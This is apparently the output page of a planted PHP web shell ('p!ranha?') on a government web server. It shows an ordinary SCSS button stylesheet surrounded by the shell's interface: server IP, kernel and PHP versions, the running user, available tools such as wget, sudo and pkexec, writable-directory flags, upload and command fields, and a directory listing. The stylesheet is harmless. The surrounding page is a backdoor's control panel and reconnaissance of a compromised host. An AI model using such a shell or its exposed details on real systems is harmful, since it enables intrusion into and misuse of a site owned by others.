p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.217.13
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/dpmptsp/public_html/promosi/assets/scss/layout/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /home/dpmptsp/public_html/promosi/assets/scss/layout/_buttons.scss
/*--------------------
   Buttons
---------------------*/
.btn {
    text-transform: capitalize;
    position: relative;
    z-index: 1;
    font-size: 14px;
    font-weight: 700;
    min-width: 170px;
    height: 65px;
    line-height: 65px;
    text-align: center;
    padding: 0 15px;
    letter-spacing: 1px;
    border: 0;
    border-radius: 3px;
    overflow: hidden;
    @include prefix(transition, all .3s linear, webkit moz ms o);

    &:focus,
    &.active,
    &:active {
        -moz-box-shadow: none;
        -webkit-box-shadow: none;
        box-shadow: none;
        outline: none;
    }
}

.btn:not(.btn__link) {
    box-shadow: 0px 3px 63px 0px rgba(40, 40, 40, 0.11);

    &:before {
        content: '';
        position: absolute;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        z-index: -1;
        background-color: $color-dark;
        @include prefix(transform, scaleX(0), webkit moz ms o);
        @include prefix(transform-origin, right center, webkit moz ms o);
        @include prefix(transition, transform .24s cubic-bezier(.37, .31, .31, .9), webkit moz ms o);
    }

    &:hover {
        &:before {
            @include prefix(transform, scaleX(1), webkit moz ms o);
            @include prefix(transform-origin, left center, webkit moz ms o);
        }
    }
}

.btn__primary {
    background-color: $color-theme;
    color: $color-white;

    &:hover {
        color: $color-white;
    }

    &:active,
    &:focus {
        background-color: $color-theme;
        color: $color-white;
    }

    &.btn__bordered {
        background-color: transparent;
        border: 2px solid $color-theme;
        color: $color-theme;

        &:hover {
            color: $color-white;
        }

        &:before {
            background-color: $color-theme;
        }
    }
}

.btn__secondary {
    background-color: $color-dark;
    color: $color-white;

    &:before {
        background-color: $color-theme !important;
    }

    &:hover {
        color: $color-white;
    }

    &:active,
    &:focus {
        background-color: $color-dark;
        color: $color-white;
    }

    &.btn__bordered {
        background-color: transparent;
        border: 2px solid $color-dark;
        color: $color-dark;

        &:hover {
            border-color: $color-theme;
            color: $color-white;
        }

        &:before {
            background-color: $color-dark;
        }
    }
}

.btn__white {
    background-color: $color-white;
    color: $color-heading;

    &:hover {
        color: $color-white;
    }

    &:active,
    &:focus {
        background-color: $color-white;
        color: $color-heading;
    }

    &.btn__bordered {
        background-color: transparent;
        border: 2px solid $color-white;
        color: $color-white;

        &:hover {
            color: $color-theme;
        }

        &:before {
            background-color: $color-white;
        }
    }
}

.btn__bordered {
    background-color: transparent;
}

.btn__link {
    background-color: transparent;
    border-color: transparent;
    min-width: 0;
    line-height: 1;
    height: auto;
    padding: 0;
    border: none;

    &:focus,
    &:active {
        background-color: transparent;
    }

    &.btn__primary {
        color: $color-theme;

        &:hover {
            color: $color-dark;
        }
    }

    &.btn__secondary {
        color: $color-dark;

        &:hover {
            color: $color-theme;
        }
    }
}

.btn__rounded {
    border-radius: 50px;
}

.btn__block {
    width: 100%;
}

.btn__icon {
    display: -ms-inline-flexbox;
    display: inline-flex;
    justify-content: space-between;
    -ms-flex-align: center;
    align-items: center;

    span {
        margin-right: 5px;
    }

    i {
        margin-left: 5px;
    }
}

.btn__social {
    height: 55px;
    line-height: 55px;
    width: 230px;
    color: $color-white;
    border-radius: 3px;
    margin-bottom: 5px;

    &:hover {
        color: $color-white;
    }

    &:before {
        display: none;
    }

    i {
        font-size: 18px;
        margin-right: 20px;
    }
}

.btn__facebook {
    background-color: #4267b2;
}

.btn__twitter {
    background-color: #1da0f0;
}

.btn__google-plus {
    background-color: #ea4335;
}

.btn__lg {
    min-width: 210px;
}

.btn__loadMore {
    box-shadow: none !important;
    height: auto;
    line-height: 1;

    &:before {
        display: none;
    }

    i {
        position: relative;
        z-index: 2;
        display: inline-block;
        font-style: normal;
        width: 27px;
        height: 27px;
        line-height: 27px;
        border-radius: 50%;
        text-align: center;
        background-color: $color-theme;
        color: $color-white;
        margin-left: 5px;

        &:after {
            content: '';
            position: absolute;
            top: 0;
            left: 0;
            width: 27px;
            height: 27px;
            line-height: 27px;
            border-radius: 50%;
            z-index: -1;
            background-color: $color-heading;
            @include prefix(transform, scale(0), webkit moz ms o);
            @include prefix(transition, all 0.2s ease, webkit moz ms o);
        }
    }

    &:hover i:after {
        @include prefix(transform, scale(1), webkit moz ms o);
    }
}

/* Mobile Phones and tablets */
@include xs-sm-screens {
    .btn {
        font-size: 13px;
        min-width: 120px;
        height: 50px;
        line-height: 50px;
    }
}
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
December 21 2023 09:42:31
1000 / 1000
0755
_animation.scss
0.888 KB
January 13 2024 08:43:07
1000 / 1000
0755
_bg-colors.scss
1.77 KB
January 13 2024 08:43:07
1000 / 1000
0755
_breadcrumb.scss
0.423 KB
January 13 2024 08:43:07
1000 / 1000
0755
_buttons.scss
5.403 KB
January 13 2024 08:43:07
1000 / 1000
0755
_forms.scss
2.269 KB
January 13 2024 08:43:07
1000 / 1000
0755
_helpers.scss
12.89 KB
January 13 2024 08:43:07
1000 / 1000
0755
_icons.scss
0.612 KB
January 13 2024 08:43:07
1000 / 1000
0755
_lists.scss
1.403 KB
January 13 2024 08:43:07
1000 / 1000
0755
_pagetitle.scss
3.078 KB
January 13 2024 08:43:08
1000 / 1000
0755
_pagination.scss
0.859 KB
January 13 2024 08:43:08
1000 / 1000
0755
_preloader.scss
1.401 KB
January 13 2024 08:43:08
1000 / 1000
0755
_tabs.scss
1.22 KB
January 13 2024 08:43:08
1000 / 1000
0755
_typography.scss
3.002 KB
January 13 2024 08:43:08
1000 / 1000
0755